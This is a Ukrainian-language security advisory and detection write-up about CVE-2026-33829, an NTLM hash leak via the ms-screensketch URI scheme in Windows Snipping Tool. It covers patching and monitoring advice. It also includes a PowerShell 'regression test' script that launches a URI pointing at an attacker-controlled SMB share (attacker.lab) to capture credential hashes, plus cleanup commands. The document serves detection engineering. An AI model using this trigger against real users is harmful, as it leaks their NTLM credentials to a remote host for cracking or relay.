SOC Prime Bias: Критичний

21 Apr 2026 15:30 UTC

CVE-2026-33829: Витік NTLM у Snipping Tool

Author Photo
SOC Prime Team linkedin icon Стежити
CVE-2026-33829: Витік NTLM у Snipping Tool
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Короткий виклад

Вразливість у Windows Snipping Tool може розкрити хеші Net-NTLM від поточного користувача, який увійшов у систему, віддаленому зловмиснику. Проблема викликана через зловмисне використання глибокого посилання, яке зловживає ms-screensketch URI схемою, що змушує Snipping Tool відкрити файл, розташований на неконтрольованій зловмисником SMB-частині. Хоча жертва повинна натиснути або відкрити створене посилання, витік облікових даних відбувається непомітно у фоновому режимі, коли Windows ініціює підключення SMB. Ця поведінка може надати зловмисникам доступ до даних Challenge/Response NTLM без будь-якого видимого попередження для користувача.

Розслідування

Дослідники виявили, що ms-screensketch протокол приймає параметр filePath і не обмежує належним чином довільні UNC шляхи. Коли Snipping Tool намагається отримати доступ до такого шляху, Windows автоматично намагається автентифікуватися на віддаленому сервері SMB, розкриваючи NTLM відповідь в процесі. Для перевірки проблеми дослідники створили сценарії доказу концепції, що запускали SMB прослуховувач та генерували зловмисний URI, здатний захопити витік хешу.

Пом’якшення

Microsoft випустила оновлення безпеки 14 квітня 2026 року, щоб вирішити проблему, видаливши вразливе поведінку з глибокими посиланнями з Snipping Tool. Встановлення цього патчу заважає застосунку автоматично відкривати шляхи SMB, надані зловмисниками, через ненадійні URI. Організаціям слід пріоритетно впроваджувати оновлення на уражених системах Windows, щоб усунути загрозу.

Відповідь

Захисники повинні моніторити спроби виклику ms-screensketch URI схеми і стежити за вихідними підключеннями SMB до незвичайних внутрішніх або зовнішніх вузлів. Системи, яким не потрібно використовувати Snipping Tool, повинні обмежити протокол, де це можливо, і примусити розгортання патчу без зволікань. Всі викриті NTLM хеші слід негайно розслідувати на предмет ознак повторного використання, релейної або іншої подальшої зловмисної діяльності.

Потік Атаки

Симуляція Виконання

Вимога: Перевірка телеметрії та базової лінії повинна бути пройдена.

Обґрунтування: Секція детально описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та розповідь МАЮТЬ безпосередньо відображати визначені TTP та спрямовані на створення очікуваної телеметрії, що визначена логікою виявлення.

  • Атака Оповідання та Команди:

    Зловмисник отримав доступ до робочої станції жертви та бажає зібрати хеші NTLM без привернення уваги. Використовуючи CVE‑2026‑33829, зловмисник створює зловмисний ms‑screensketch: URI, що вказує на віддалене SMB-сховище, контрольоване зловмисником (\attacker.labsharepayload.png). Коли Snipping Tool обробляє цей URI, Windows автоматично ініціює SMB-з’єднання з віддаленим сервером, розкриваючи NTLM відповідь машини. Зловмисник виконує URI через PowerShell, щоб забезпечити виклик Snipping Tool в контексті користувача.

  • Сценарій Регресійного Тесту:

    # Витік NTLM через Snipping Tool - тригерний скрипт
    # Налаштуйте UNC шлях для направлення на ваш контрольований прослуховувач.
    $attackerServer = "attacker.lab"
    $sharePath      = "sharepayload.png"
    $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath"
    
    Write-Host "Виклик Snipping Tool із зловмисним URI..."
    Start-Process $uri
    
    # Почекайте кілька секунд, поки не завершиться SMB підключення
    Start-Sleep -Seconds 5
    
    Write-Host "Виконання завершено. Перевірте SIEM для події EventID 3 з DestinationHostname, що містить '$attackerServer'."
  • Команди Очищення:

    # Видаліть будь-які залишкові процеси Snipping Tool (якщо ще працюють)
    Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue |
      Stop-Process -Force
    
    # Опційно: видалити тимчасові файли, створені на боці зловмисника (якщо такі є)
    # (Припускаєте, що у вас є доступ на запис до сховища)
    # Remove-Item -Path "\$attackerServer$sharePath" -Force